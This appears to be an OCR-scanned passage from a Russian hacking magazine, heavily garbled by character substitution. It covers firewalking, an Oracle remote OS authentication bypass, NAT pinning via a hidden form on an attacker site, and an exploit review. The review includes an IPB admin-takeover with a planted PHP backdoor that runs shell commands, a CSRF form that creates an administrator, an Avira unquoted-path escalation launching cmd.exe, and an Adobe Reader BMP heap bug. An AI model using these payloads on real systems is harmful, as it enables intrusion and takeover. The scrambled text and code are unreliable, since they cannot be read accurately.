технику. Конечно, Тігеѵѵаікіпд, которую придумали когда-то давно М. Шиф- 
ман (М. ЗсііИТтап) и Д. Голдсмит (О. СоісізтіШ}, может показаться трух- 
лявым пнем: и вендоры в теме, и админчики вроде тоже... Но так как эта 



бага относится к ряду тізсопіідигаііоп, то и встречается она на практике 
систематически. 

Перейдем к делу. Для начала, чтобы понять эту технику, давай вспомним 
такое поле, как ТТІ_ в заголовке ІР-пакета. Вики говорит, что «значение ТТІ_ 
может рассматриваться как верхняя граница времени существования ІР- 
датаграммы в сети». В ІР-пакете данное поле уменьшается на 1 на каждом 
из узлов между источником и получателем. Оно необходимо для того, чтобы 
в сети не было пакетов, которые по тем или иным причинам вечно бы курси- 
ровали в ней. А как только ТТІ_ становится равен 0, хост (на котором это про- 
изошло) должен отправить источнику ІР-датаграммы ІСМР-пакет с типом 
«ЮМР_Т1МЕ_ЕХСЕЕОЕО». 
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В общем-то, на основе этого работает программа ІгасегоіДе (или Іхасегі 
под ѴѴіп). Мы указываем некий хост, до которого хотим построить трейс, 
и посылаем пакет (ІЮР для первой и ІСМР для второй) со значением ТТЦ 
равным 1 . И ближайший хост присылает нам сообщение ІСМР о том, что па- 
кет удален. Далее мы увеличиваем ТП и еще раз отправляем пакет. Ситу- 
ация повторяется, и мы узнаем следующий узел на нашем пути. Таким вот 
образом мы доходим до нашей цели. Причем здесь важно отметить, что так 
как ТТІ_ — часть ІР-заголовка, то более высокий протокол мы можем исполь- 
зовать любой: и ІЮР, и ІСМР, и даже ТСР. Теперь же, помня все это, мы под- 
ходим к методике Тігеѵѵаікіпд’а. 

Суть ее заключается в том, что на основе анализа ответов от файрвола 
с ТТІ_ у посылаемых пакетов больше, чем до файрвола, на 1, мы можем по- 
нять, какой порт по какому протоколу фильтруется, а какой нет. Сейчас по- 
ясню на примере. 

Методика состоит из двух шагов. Первым, ясное дело, надо определить 
месторасположение файрвола на трейсе. Для этого мы можем использо- 
вать любой метод трейса. Итогом будем некое значение ТП_до файрвола. 

Второе — это само сканирование файрвола. Предположим, мы по- 
шлем какой-то ТСР-пакет на хост за файрволом, но ТТІ_ будет равен ТТІ_ 
до него. Тогда нам файрвол ответит, что время жизни пакета исчерпано. 
А если же мы пошлем на единицу больше, то есть на один хост за файр- 
вол? Тогда сработает магия. Если данный ТСР-порт фильтруется файр- 
волом, тогда он ответит нам молчанием. Если же не фильтруется, то нам 
тогда придет сообщение «!СМР_ТІМЕ_ЕХСЕЕОЕО», но уже от узла, сле- 
дующего за файрволом. Данный узел принято в контексте Игеѵѵаікіпд’а 
называть теігіс. 

Таким образом, если фильтруется — мы не видим ответа на свой ТСР- 
запрос, а если не фильтруется, то мы видим ІСМР-пакет в ответ. Ну и как уже 
было сказано, используя данную логику, мы можем определить правила 
фильтрации на файрволе как по ТСР-, так и по ІЮР-протоколу. 

Что еще приятно — мы можем определить правила на нескольких файр- 
волах. Для этого нужно сделать все то же самое, но метрикой выставить хост 
за вторым файрволом. 

Теперь поговорим об основных проблемах. Во-первых, исходящие ІСМР 
в правильной конфигурации должны фильтроваться файрволом. Это-то и яв- 
ляется той мисконфигурацией, которая позволяет нам его анализировать. 
Во-вторых, есть некие более умные девайсы, которые знают расстояние 
до итоговой цели, а потому, если ТТІ_ меньше необходимого, отбраковывают 
пакеты. Кроме того, общее ограничение — нам надо знать внешний ІР хоста 
за файрволом, то есть ІЧАТ не даст возможности заюзать данную технику. 
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Конечно, ограничения эти достаточно суровы, но, с другой стороны, вну- 
три корпоративной сети (из одного сегмента атака на другой) многие из них 
уже не будут действовать, что даст нам возможность для Іігѳѵѵаікіпд’а. 

Реализовать сами атаки можно либо с помощью тулзы Тігешаік (есть в ВТ, 
Каіі), либо используя М8Е-скрипт'Пгеша1к в Мтар’е. 



ОБОЙТИ АУТЕНТИФИКАЦИЮ В СУБД ОВАСЬЕ 



РЕШЕНИЕ 

Должен признаться, что я не большой знаток СУБД Огасіе. Наверное, весь 
мой опыт работы с нею заключается в различных методах ломания ее :}. Так 
что уж заранее простите за возможные терминологические и другие косяки. 
Хотя на саму суть задачи это повлиять не должно. 

Огасіе ЭВ — тот еще старичок. В ней есть много всяких олдскульных штук. 
Которые, как ни странно, до сих пор еще активно используются. Одна из них — 
параметр ВЕМ0ТЕ_05_А1ЛНЕМТ. Одно из почти официальных описаний го- 
ворит о нем следующее: «Параметр инициализации ВЕМ0ТЕ_03_АІІТНЕМТ 
предоставляет доверительную модель сетевой аутентификации, пользовате- 
ли, имеющие учетные записи операционной системы, могут получать доступ 
к базе данных. Таким образом, вся ответственность аутентификации ложится 
на операционную систему». Сильно упрощая, можно сказать, что с данным 
параметром ответственность за аутентификацию под пользователями пере- 
кладывается на плечи ОС. Казалось бы, что в этом такого? Типа если у тебя 
есть пароль на учетку в ОС с СУБД, то и ОК, логинься по ней в СУБД — все 
вполне безопасно. Особенно если пароль отучетки в ОС не сливать, то, пока 
хакер ОС не ломает, доступа у него не будет. 

Все это так, да не совсем. Проблема в том, что это распространяется 
и на удаленную аутентификацию в СУБД. Но сначала поясню сам процесс ау- 
тентификации с ПЕМОТЕ_03_АІІТНЕМТ. 

Когда мы локально подключаемся, фактически наш клиент не посылает 
логин или пароль, а просто отправляет имя пользователя из ОС. И Огасіе ве- 
рит этому. Но, как я выше сказал, ничего не стоит подключиться к ТІМЗ-порту 
удаленно и отправить необходимое имя пользователя. 

То есть, утрируя, когда мы подключаемся, можно сказать, мы говорим 
следующее: «Моя ОС подтверждает, что я супер-пупер-админ». А оракл та- 



кой: «Ну, если твоя ОС говорит, то я верю!» Согласись, невероятная техно- 
логия :). 

Если тебе кажется, что это — «отсталость», которую уже никто не исполь- 
зует на продакшне, то я попробую тебя разубедить: многие крупные биз- 
нес-приложения работают именно с включенным НЕМ0ТЕ_03_АІІТНЕМТ. Да 
и в интернете можно найти мануалы по включению и успешному использо- 
ванию данной фичи. Конечно, есть всякие костыли, чтобы закрыть эту неимо- 
верную дыру, типа сегментации, чтобы не было доступа до СУБД, или опре- 
деления списка хостов, с которых разрешено подключение к СУБД. Но это же 
надо все внедрить, да еще и так, чтобы мы не обошли :). 

И в качестве примера последовательность для обхода аутентификации 
при подключении к СУБД, которая обслуживает какую-нибудь ЗАР-систему: 

1 . Узнается ЗЮ сапа (сделать это очень просто, так как инфа не секретная). 

2. Создается в ОС пользователя с именем ЗЮасІт. 

3. Запускается под новосозданным пользователем команду 

5д1р1іі5 /ЙІ(РЕ5СК І РТІ0М=(АРРКЕ55 І І5Т=(АРРК Е 55=(РЙ0Т0С0І-=<-. 

ТСР) (Н05Т=0гас1е_ІР) (Р0КТ=ТІЧ5_рог1:) ) ) (ССШЕСТ-ОАТА^ 

(5ІР=5АР 5ІР) ) ) 

где Огас!е_ІР — адрес СУБД Огасіе; ТІ\ІЗ_роіТ — порт ТНЗ Ііэіепег’а; 
ЗАР_5Ю — ЗЮ ЗАР’а. 

Все. Невероятно, но факт — доступ в базу данных полученг. Таким обра- 
зом, для обхода этого вида аутентификации требуется только лишь знать имя 
пользователя. А с учетом того, что эта инфа передается в открытом виде, то с 
помощью МІТМ-атаки злоумышленник ее сможет выкрасть. 
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ПРОБИТЬСЯ ЗА ИАТ 



РЕШЕНИЕ 

Продолжая тему про сетевые штуки, давай вспомним про такую интересную 
технику, как ІЧАТ ріппіпд. С помощью ее мы имеем возможность проникнуть 
из внешней сети за сетевой девайс, организующий ІЧАТ, и попытаться под- 
ключиться к одному из узлов в МАТ’е. 

Для галочки немного теории. МАТ — пебл/огк аббгезз Ігапзіаііоп — «это 
механизм в сетях ТСР/ІР, позволяющий преобразовывать [Р-адреса тран- 
зитных пакетов». Например, сейчас у многих стоит дома ѴѴі-Рі и организова- 
на локальная сеть, при этом внешний ІР-адрес один, и выдан он внешнему 
интерфейсу ѴѴі-Рі. Но хосты из твоей сети могут ползать по инету. Как? Как 
раз МАТ помогает. Когда ты заходишь на какой-то сайт, твои данные прохо- 
дят через твой роутер. Он уже, в свою очередь, подменяет в пакетах, пере- 
даваемых тобой, исходящий ІР на свой внешний 1Р, а также указывает другой 
исходящий порт. Соотношение между твоим ІР и твоим портом сопоставля- 
ется с внешним портом ѴѴі-Рі- роутера и хранится вайфаем. Таким образом, 
ответные пакеты от сайта, на который ты заходишь, придут уже твоему ѴѴІ- 
Рі-роутеру, и он, сделав обратную трансляцию из своего порта в твой ІР и 
твой порт, сможет передать тебе данные от сайта. 

Плюсы МАТ’а легко заметны: очень удобно и дешево. Экономит заканчи- 
вающиеся ІРѵ4-адреса. Скрывает хосты, находящие за МАТ’ом, от прямых 
подключений извне. Последний факт мы и постараемся победить. 

Итак, МАТ ріппіпд. Автор техники — Сами Кэмкар {Зату Каткаг — автор 
Музрасе-червя Зату), и, наверное, потому техника находится на стыке тех- 
нологий и юзаются веб-штуки. Хотя сначала, вероятно, стоит обратиться к 
одному минусу МАТ’а. Он заключается в том, что есть целый ряд олдскульных 
протоколов, которые требуют для своей работы использования двух под- 
ключений. Если проще, то и от нас к серверу, и от сервера к нам. Примером 
может быть РТР (отдельно поток для команд, отдельно для данных) или ІПС. 
То есть клиент может подключиться к серверу, а вот сервер обратно уже нет 
(если соответственная трансляция не настроена вручную). Для того чтобы 
бороться с таким проблемами, есть разные методы, и один из них — дина- 
мическая трансляция обратных подключений. Эта фишка есть у некоторых 
более продвинутых сетевых девайсов (в том числе ѴѴі-Рі -роутеров). Они 
контролируют трафик, и если видят определенный протокол и команды в 
нем, по которым нужно обратное подключение к хосту в МАТ, то они авто- 
матически создают правила трансляции в обратную сторону. Таким обра- 
зом, серверная сторона уже сможет подключиться к хосту в ИАТе. 

Иметь такой умный девайс, конечно, хорошо. Вот только он порождает 
для нас как для атакующих возможность добраться до хостов, находящихся 
за этим умняшкой. И вот теперь последовательность от Сэми, которая по- 
зволит нам это провернуть: 



1 . Заманиваем нашу жертву на наш сайт (ййр://а11аскег.сот). 

2. На нашем сайте мы размешаем скрытую формочку, которая будет под- 
ключаться к нашему же поддельному ІНС-серверу (1Шр://аИаскег. 
сот:6667). 

3. При входе на наш сайт браузер жертвы автоматически сабмитит формоч- 
ку. Таким образом браузер как бы подключается к нашему поддельному 
ІВС-серверу. 

4. Наш ІПС-сервак должен делать ничего :), просто слушать порт. 

5. В формочке на нашем сайте также должно быть скрытое поле, в котором 
будет примерно следующее значение «РНІѴМЗС зату :\10СС СНАТ зату 
[ір іп бесітаі] [рогТ]\1\п», где [ір іп бесітаі] — ІР-адрес, с которого мы 
будем подключаться к нашей жертве, и [рогі] — это порт, к которому мы 
хотим получить доступ у жертвы. При сабмите формы эти данные будут 
отправлены на наш поддельный ІНС-сервер. 

6. Далее присмотримся к умному ѴѴі-Рі -роутеру нашей жертвы. Он увидит, 
что жертва подключается на ІВС-сервер где-то в инете, а кроме того, еще 
и инициализирует попытку РСС-чата. А РОС, как ты, наверное, уже понял, 
требует, чтобы удаленный хост подключался к клиенту (то есть к нашей 
жертве). 

7. Основываясь на своей умности, он думает, что коли жертва хочет с кем-то 
початиться в Сети, то почему бы ей не помочь в этом. И создает времен- 
ное правило, пробрасывающее с внешнего іР-роутера с порта, указанного 
в настройках для чата — [рогі], данные на внутренний {ЫА!) ІР жертвы на 
тот же порт — [рогі]. 

Та-дам! Мы имеем доступ! По сути, мы можем проводить атаки на любой 
порт у жертвы, на любой протокол. Очень круто. Так что и за ИАТом — не 
как за каменной стеной. Кстати, попробовать метод можно на сайте Сэми — 
сіоо.дІ/2Ы-І , кроме того, аналогичный модуль должен быть в фреймворке 
ВеЕР, 

Далее немного о минусах метода. Как было сказано, техника эта основа- 
на именно на умности ЫАТ -девайса, и нам необходимо, чтобы девайс жерт- 
вы был таким. В своем примере Сэми провернул это дело на Веікіп N 1 Ѵізіоп 
ѴѴІгеіезз Поиіег, а вот мой Р-Ыпк оказался не так умен. Так что я ощущаю 
себя в полной безопасности :). 

На этой приятной ноте прекращаю сегодняшний поток мыслей. Наде- 
юсь, что было интересно :). Если есть пожелания по разделу Еазу Наек или 
просто желание поресерчить — пиши мне на ящик адгггсі од@ д т аіі .с о т . 
Всегда рад :). 

И успешных познаний нового! НЕ 
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\ѴАКЫШС 

Воя информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



Простейший пример того, как работает МАТ 



Взлом 
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\ѴАІШШС 
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Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 




Борис Рютин, ЦОР (Езаде (.аЬ) 

с!икеЬагтап@хакер.ги . 
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Наверное, ты ожидал новую уязви- 
мость в иаѵа? Но увы, на счетчике 
сайта іаѵа-ОсІау.сот горит месяц от- 



сутствия новых уязвимостей нулевого 
дня... Зато нас ждет подробное опи- 
сание одной из свежих уязвимостей 
в старом добром АбоЬе Реасіег. 







ІРВ (ІМѴІЗКМ РОѴѴЕВ ВОАРВД ВСЕ ВЕРСИИ — 
ОТ ЗАХВАТА ПРАВ АДМИНА ДО ВЫПОЛНЕНИЯ 
ПРОИЗВОЛЬНОГО КОДА 

Дата релиза: 13 мая 2013 года 

Автор: ѵіоііп ЗЕАІЧ 

СѴЕ: М/А 

Начнем сегодняшний обзор с необычной веб-уязвимости — перехвата прав 
любого пользователя в популярном форумном движке ІРВ. 

В функции проверки почты пользователя используется удаление пробе- 
лов. Пример кода из файла абтіп/зоигсе/Ьазе/соге.рІтр: 

зііаіііс риЬІіс Типсііоп сИескЕтаіІАббгеааб Іета іі = "" ) { 

$етаі1 = 1:гіт($етаі1).і 

$етаі1 = зіі ггеріас е ( " " л $етаі1 

Как ты можешь знать, Тгіт удаляет пробелы (и некоторые другие симво- 
лы) до и после строки, поэтому разработчики ІРВ дополнительно используют 
зіг геріасе, чтобы удалить пробелы в почте. И далее в функции ІоасІ для за- 
грузки информации о пользователе в файле абтіп/зоигсез/Ьазе/ірзМетЬег. 
рИр в качестве Ю пользователя использует его етаіі: 



_!егааі1^ 

і-Г ( із_аггау( $тетЬег_кеу ) ) 

і 

аггау_ма1к( $тетЬег_кеу., сг-еаѣ е Т ипсЕіоп ( 1 &$ѵ і $к ' . 

' $ѵ="\ ' " . ірзКе§І5І;гуі :0В(і^>асІсІ51а5Іте5 ±= і 

( 5І:г1:о1омегХ $ѵ ) ) . "У ";' ) )і 
$ти1'Сір1е_ісІ5 = $тетЬег_кеу; 

} 



і 

$тетЬег_ѵа!ие = . ірзКе§із1:гу 

ас1сІ51а5Ье5( 5І:г1о1омег.( $тетЬег_кеу ) ) . ; 

1 II 

$тетЬег_йе1сі - ' етаіі 

Как видно, никакой проверки длины переменных $тетЬег_кеу и $ѵ нет, 
поэтому можно передать етаіі с ложными пробелами. Теперь рассмотрим 
эксплойт. 

ЕХРЮІТ 

Первым делом ищем етаіі администратора, его можно получить различными 
способами: 

• воспользоваться ѵѵИоіз для домена, на котором установлен форум; 
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)бзор ЭКСПЛОЙТОВ 



* проверить предполагаемый етаіі в различных социальных сетях; 

* использовать Сгаѵаіаг; 

* использовать СИ или Х53 на других сайтах. 

После того как мы получим етаіі, создаем своего пользователя сложным 
ящиком. Так как размер переменной в БД равен 150 символам (ѵагсбаг(150)), 
нам нужно передать: 

* етаіі; 

* оставшееся количество пробелов до 150; 

* несколько любых символов, чтобы пройти А1АХ- валидацию. 

Пример: 

Реа льный етаіі администратора: ' а бтіпій абт і п . сот ' 

Атакующий етаі1і_ 1 абтіп(Эабтіп.соіп <много пробелов> АААА' 

Для передачи етаіі также можно воспользоваться программой Вигр ЗиЛе 
либо любым другим манипулятором НТТР-запросов. 

Теперь проходим в свой профиль и меняем пароль на любой, а система, 
в свою очередь, поменяет у того, кого выберет команда 5Е1_ЕСТ, то есть у ад- 
министратора. Далее можно залить небольшой бэкдор, идем в редактирова- 
ние шаблонов /ас1тіп/іпсІех.рІір?асІ5ез5=000&арр=соге&тосІиІе='І:етрІа1е5§ 
Іоп=1етр1а1е5&сіо-Ііз1&5еію=1 и добавляем в сІеІаиІІНеасІег следующий код: 

<рир> 

і-р(І55еі($ КЕ01ІЕ5Т[ ' ріліпсі '1*0 

і 

$рмпб=$_КЕ(2ЦЕ5Т[ '.рілтбХХ 

есНо ' $рипбА 

I - 

</рЬр> 

Теги <рбр> и </рбр> используются шаблонизатором ІРВ для вставки РНР- 
кода, а символы " — для выполнения системных вызовов. Протестируем: 

і п сі е х . р ЬрРрѵлі б =1 5 %2 0/ 

И получим: 

Ьіп Ьооі Ьиііб беѵ еіс Лоте _з.піігб^іт§ іпі ігб. іте.оіб ІіЬ 
Іові+іоипб тебіа тпі попехІ5іепі орі ргос гооі гип зЫп 
Беііпих 5 гѵ зу5 ітр изг ѵаг ѵтііпиг ѵтііпиг.оіб 

ТАЯСЕТ5 

ІРВ <= 3.4.4. 



50ШТІ0Ы 

Доступно обновление с исправлением данной ошибки от производителя. 
Правда, на просторах интернета можно встретить несколько версий для оз- 
накомления, поэтому администраторы могут воспользоваться патчем от ав- 
тора уязвимости (Ы1.Іѵ/12оік5Ш . 



г~ 









— 






■ 






,01 



ИД 1 1 , ЦД 



кшввм 



р«. 



] &ійй-ягі Г'г&іеи 

□ ~ 

~ ~ Ігі'егхірЬ; 

] гай гуг- 

а 

Ы іі ІѵН-д'Ѵ: «((; 
ЙИв^ѴКЖ 0*6 
Ьі ~1 : 

вне 

Д ЗѴСІОЙ бДг 
С 

^ цуи-уоНі 
“П ВЫеЗѵ. 

] Ѵн'і.- .ОГ. 

«к* 

^ірсоізѵ ех; 
ЗАЗІсое 

0 ~'|.зѵтчт~- дге 

□ ^■ЙГПГІ ■'УТЛ 

^ргаг^яф 
~1 г ■. уі-пя оур 

— 1.-||~і :-| Г-*Й 
— 1 '— уѵ: 

~1 РН Г. іѴ:Ц о ^ УЧ С--5 6*6 
' — |і'Х-бі'У едь 
вив 



РЮ 



I 

Г4*- 



| ТСР/ІР 

гГГ'ІЫтПі 



БёСЫПу | 



С;\>Пій'С и я (Я* пт.з_ия-_ 

ЕГ\>В 1-ЛіЧ иГСІСеБЦВ’ХІІІОГйГ 



Ѵгггізі : 
Гіта 1 . 



ССрЛПОТЧ,»-: КСЛ'ЛпД ѴѴлііі'л г, 
^■ІОТ ■ Г I Г г- гГ' УІГ'ГПГ'-.'І. -я КлЛ 
ь.і.зйбс.ііаа 
:в.ля ,?гл->7{00 



Раі]': 

I С : ‘ГѴІГОО Л'З І, <іійпуЭ2Ѵі-і: ,сд6 
СОП'ЧйаПЙ ІИбГ 

I 'С ; ѴтГМѴЛ^узитЗ’І^^ГбИ; 
Слтепі сігесйну: 




Пример работы эксплойта в Аѵіга РегаопаІ 



ІІМІ.СМЗ 2.9 — УЯЗВИМОСТЬ ТИПА СЗРГ 



СѴ88ѵ2: 

Дата релиза: 
Автор: 

СѴЕ: 



5.1 {АѴ:Ы/АС:Н/Аи:Ы/С:Р/І:Р/А:Р) 
8 мая 2013 года 
Нідб-Тесіп Вгісіде ЗА 
2013-2754 



Так же как это было с ЗОБ-инъекциями, после официального объявления но- 
вого типа уязвимостей СЗВР такой вид стали находить в различных продуктах 
и сервисах. В этот раз под прицел исследователей попала ІІті.СМЗ, которая 
позиционируется как конкурент популярной СМ3 1С-Битрикс. 

Уязвимость позволяет выполнить определенные действия в системе с по- 
мощью НТТР-запроса без проверки, откуда он поступил. 

ЕХРЮІТ 

Для эксплуатации создается веб-страница, на которую необходимо перена- 
прави администратора: 

<-Рогт ас і і о п = " Ь Ир: //[Нові ] / а б т і п / и в е г 5 / а б б / и 5 е г/ б о/ 11 <-< 

теіі'Юб^'розі" пате="таіп"> 

кіприі 1уре=''біббеп" пате="баіа[пеы] [Іо^іп] " *-■ 

ѵа1ие= ,, с5Г'Ри5ег”> 

кіприі іуре^'біббеп" пате="баіа[пем] [равзмогб] [ ] " +-* 
ѵ а1ие="ра55Цогб"> 

кіприі іуре="Іііббеп" пате=’'баіа[пеы] [егтаіі] " 

ѵа1ие="изег@таі1 . сот" > 

кіприі іуре^'біббеп" пате="баіа[пеы] [ізасііѵаіеб] " <-■ 

ѵа1ие="1" > 

кіприі: ±у р е="Іііббеп ' 1 пате=''гіаѣа[пеы ] [-Еп ате] " <-■ 

ѵаіие= "иве плате 11 > 

кі приі: 1:уре= , '|ііббеп " пате="баѣа[пеы] [дгоирв] [ ] ” 

ѵа1ие="1'*> 

кіприі іуре="Іііббеп" пате=”баіа[пеѵѵ] [§гоир5][ ]" 

ѵа1ие="2" > 

кіприі: *ур.е="1иббеп" пат е=" " ѵа1и е=""> 
кіприі іуре=’'5иЬтіі"_іб="Ьіп" > 
к/іогт> 
к зсгір і > 

боситепі . таіп . 5иЬтіі (Хі 

К/ 5СГІрІ> 

В результате в системе будет создан новый администратор с именем 
сзгіизег и паролем раззѵтогсі, 

ТААСЕТ8 

иіУІІ.СМЗ<=2.9. 

80ШТІОЫ 

Доступно обновление с исправлением данной ошибки от производителя. 

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В АША 
РЕК80ИАІ. 

Дата релиза: 15 мая 2013 года 

Автор: АкаЗіер 

СѴЕ: ІЧ/А 

Уязвимость существует из-за неправильного вызова функции СгеаІеРгосезз. 
Если мы посмотрим описание в МЗБИ (ЫіІу/1 ЗРТС ), то увидим, что если 
не добавить кавычки в имена путей, имеющие пробелы, то получим на выходе 
подобные вызовы: 

с : \рго§гат.ехе 51ев\виЬ біг\рго§.гат пате 
с:\рго^гат Шез\5иЬ .ехе біг\рго§гат пате 
с:\р.поё.гат 1і1ев\5иЬ бігХргоегат.ехе пате 
сіАрпо^гат 1і1е5\5иЬ біг\ргоёгат пате. ехе 

То есть нам достаточно создать файл с именем Ргодгат.ехе в корне систем- 
ной директории, и Аѵіга запуститего с правами МТ АиТНОВІТУ/ЗУЗТЕМ . 

ЕХРЮІТ 

Для эксплуатирования уязвимости воспользуемся возможностями АиІоІТ 
и скомпилируем код как ехе-файл: 
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ИИі 1е 1 

5Іеер(18000); 

// Показывает права, с которыми запустилось окно 

МзеВох(64,_^.. "ВІаНГ. & |ЭСКІ_Р & іліооі Ые еоі=> _!!_ & 

ЙЦ зегМате) ; 

// Запуск стсі.ехе 

5Ііе11Ехесиіе("стсІ . ехе"); 

[лЗЕпсі 



Результат выполнения после перезагрузки системы можно увидеть 
на скриншоте. 



ТАЙСЕТ8 

Продукты Аѵі га: 

• Ргосіисіѵегзіоп 10.2.0.719 25.10.2012; 

• ЗеагсМ епдіпе 8.02.12.38 07.05.2013; 

• Ѵігиз Уеііпіііоп Тііѳ 7.11.77.54 08.05.2013; 

• Сопігоі Сепіег 10.00.12.31 21.07.2011; 

• Сопіід Сепіег 10.00. 13.20 21 .07.2011 ; 

• [_ике Рііеѵл/аікег 10.03.00.07 21 .07.2011 ; 

• АпйѴіг Сиагс1 10.00.01 .59 21 .07.2011 ; 

• Ріііег 10.00.26.09 21.07.2011; 

• АпІіѴіг ѴѴеЬСиагс1 10.01.09.00 09.05.2011; 

• ЗсМесІиІег 10.00.00.21 21 .04.2011 ; 

• Іірсіаіег 10.00.00.39 21 .07.2011 . 



ЗОШТІОЫ 

На момент подготовки статьи патча не было. 

АООВЕ КЕАОЕК ВМР/РІ.Е - 
ПОВРЕЖДЕНИЕ КУНИ 

Дата релиза: 14 мая 2013 года 

Автор: Реііат 

СѴЕ: 2013-2729 




Ошибка проявляется при парсинге ВМР-файла, который был сжат с помо- 
щью алгоритма ПІ_Е8. Для воспроизведения уязвимости нам нужно встроить 
это изображение в интерактивную форму РОР-документа. Обработкой ХРА- 
формыи ВМ Р-файла занимается плагин АсгоРогт. арі. Для начала рассмотрим 
ХРА-код. 

РЭР-файл ы могут содержать два ти па форм : 

• стандартные — Рогплз Оаіа Рогтаі (РОР о г АсгоРогтз); 

• основанные на ХМІ_ — ХМ1_ Рогтз Агсбііесіиге (ХРА). 

Впервые ХРА-формы были добавлены в версию 8.1 АсіоЬе Веасіег, и хроно- 
логию их версий можно увидеть в таблице. Как ты уже понял из названия, ХРА 
основывается на шаблонной системе и использует простую грамматику. При- 
мер простейшей формы, содержащей изображение: 



ХРА-форма может быть встроена в пустой РОР- поток и воспроизведена 
всеми последними версиями АбоЬе Ріеасіег. Если мы рассмотрим РОР-файл 
поближе, то он должен будет содержать следующие поля: /МеебзНепсІеппд, 
/Ехіепзіопз и /АсгоРогт, То есть наш файл будет вы глядеть примерно так: 

3 0 оЬ] 

Дегтем 12345 >> 
зігеат 

ХРА . . . . 
епсізгеат 
2 0 оЬі 

« /ХРА 3 0 К >> 
епсІоЬ] 

1 0 оЬз 

<< /Туре /СаТаІое 

/ №есІзК е псІегіп% ігие 
/АсгоРогт 2 0 8 
/Ехіепзіопз << 

/ЛОВЕ << 

/Ва5еѴегзіоп /1.7 
/Ехіепзіопіеѵеі 3 

>> 

>> 



>> 

епсІоЬ] 

Далее рассмотрим сам баг в формате ВМР. Этот формат может сжиматься 
в двух режимах: «чистом» (как есть, то есть без сжатия) и через алгоритм В1_Е 
{Вип [_епд11п Епсосііпд, кодирование длин серий или кодирование повторов). 
Сам механизм сжатия довольно прост, второй байт — это пиксель, а первый 
байт — количество его повторов. Если количество байт равно нулю, то второй 
байт будет специальным — ЕОІ_или разница (беііа). 

В «чистом» режиме второйбайтсодержит количество байтов, которыебудут 
скопированы буквально. Каждый проход в таком режиме должен быть выров- 
нен по границе слов, то есть мы должны заполнить дополнительными байтами, 
которые не входят в это число. После прохода в таком режиме продолжается 
ЯІ_Е-сжатие. 

Таблица с указанием специальных байтов: 



Второй байт_ Значение 



0 


Конец, строки 


1 


Конец Ьіітар 


2 


Разница (Уеііа). Следующие два байта — 


это горизонтальное и вертикальное смещение 
от текущей позиции до следующего пикселя 


3-255 


Переключение в «чистый» режим 



Теперь рассмотрим уязвимую функцию, которая отвечает за обработку ВІ_Е 
В М Р и находится в Асго Ро гт . арі . Н иже п редстав л ен псевдокод п осле де ком п и - 
ляции этого файла: 



кіетріаіе хт1П5 :хТа="ІтЕір: //ыыы. хТа. ог ^/ зсМета/*-- 
х-Ра-іетрІаіе/З . 1/"> 

кзиЬТогт пате="ТргтГ' 1ауоиі="іЬ" 1оса1е="еп_У5" 

гезіогеБіаіе^' аиіо " > 

<раёе5е1:> 

<ра§еАгеа пате="Ра§е1" і (і=“Раее1"> 

ксопіепіАгеа х= ,| 0.25іп" ѵ="Ѳ.25іп” іаі="576рі и «-< 
Ь=”756рі 1, /> 

Ктесііит 5Іоск="сІеТаіі1і И 5Ііогі="612рі" <-< 

1оп.ё-"792рі"/> 

</ р аееА г еа> 

</ра§е5е1:> 

< зиЬТогт 57брі^_ Н- " 756рі " > 

<“8е1с1 пате="Іта§еріе1с1" > 

<иі> 

кіт а^ еЕсІіІ: Уа іа= , ‘ етЬе с!" / > 

< /иі> 

<ѵа1ие> 

<іта§е> ААААА. . АААААА</іта§е> 

</ѵаіие> 

</беіс!> 

</зиЬТогт> 

</зиЬТогт> 

</іетр1аіе> 



сЬаг* г!е(РИЕ* зігеат, ипзі§песІ Иеі^Мі. ипзі^песі цісіііі ){ 
азз егі (Ие і §Ы: < 4096 && Иеі^Иі < 4096 ^ 




Процесс, за пущенный нашим Ргодгат.ехе 
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Обзор эксплойтов 



Ѵегеіоп 


АсгоЬаі: Ѵегзіоп 


2.6 


АсгоЬаі 8.1 /АсгоЬаі 8. 11 


2.7 


АсгоЬаі 8 . 1 


2.8 


АсгоЬаіЭ.О, 

АсгоЬаІ 9 АІ_апд Іеаіигез 


3.0 


АсгоЬаІЭ.І 


3.3 


АсгоЬаі 10.0 



Хронология обновления ХРА- формы 
в АйоЬе Неасіег 




Ьаг * Ііпе: 



ХРА Ѵегзіоп 


АсгоЬаі Ѵегзіоп 


2.6 


АсгоЬаі 8.1/АсгоЬаІ 8.11 


21 


АсгоЬаі 8.1 


28 


АсгоЬаі 9.0, АсгоЬаі 9 АЬзпе Геаіигез 


3.0 


АсгоЬаі 9.1 


3.3 


АсгоЬаі 10.0 



а55е гЬ ('Ее х'Е ыге^ : 

ы]пі1е_( ! Хоо-Р^зЬгеат) ) { 

1геасі(&стсІ л 1 л 2 Л зЬгеат); 

ІІ ( стсі.герь ) { 

аззегі ( урр5 < Ьеі§Ы: && стб.герз + хро5 <= иісіЬЬ ) ; 

// ЕЯЕ-режим, повторение значения 

-Рог (сои іт^ = 0; соипі < .стскгерзі. соипЬ++) { 

Ііпе _ ЬехЬиге + (ѵро5*ыісІ 1 :Іі) ; 

1іпе[хро5++] = стсі.ѵаіиеі 

1 

// Если стб.герз равна Ѳ. то ѵаіие — это команда 

> еізе { 

5ш/Ьс]т(стс1. ѵаіие) { 

сазе 0: // Конец строки 

уроз -= 1; 

хроз = 0І 



сазе 1 : // Конец Ьіітар 

геііигп ЬехЬиге; 

// Разница (сІеХіа), сдвигаем ВМР-указатель 



геай(&х<Ле11:ал 1 0 1, зігеап П : // Прочитать 1 

// байт 

геас1(&усІе11:а л 1 Л 1, зЬгеат) : // Прочитать 1 

// байт 

хроз +=_ хбеІЬа ; 
уроз - = убеГЕа; 

Ьгеак ; 

сіе-раиіі:: // Копирование 

аззегі: ( уро5 < Иеі^ИІ: && стсі. ѵаіие + 

хроз <= ѵѵісИіРі ; 

-РоК соипЬ - 0; соипі < сплсі . ѵа1иеі_ соип1:++){ 
1 : геас1(&аих і 1, 1, зЬгеат); 

Ііпе = ~Ь ехЬиге+(ыі сИ:Ь* уро5) ; 

1іпе[хроз++] = аих; 

} I 

і-г ( стб._ ѵаіие & 1 ) // Заполнение 

^геас1(&аих л 1 л 1 Л зЬгеатХ; 



Как видим, в функциях РеоРС ), Тгеаб () и плаІІос() нет ничего необычного. Пе- 
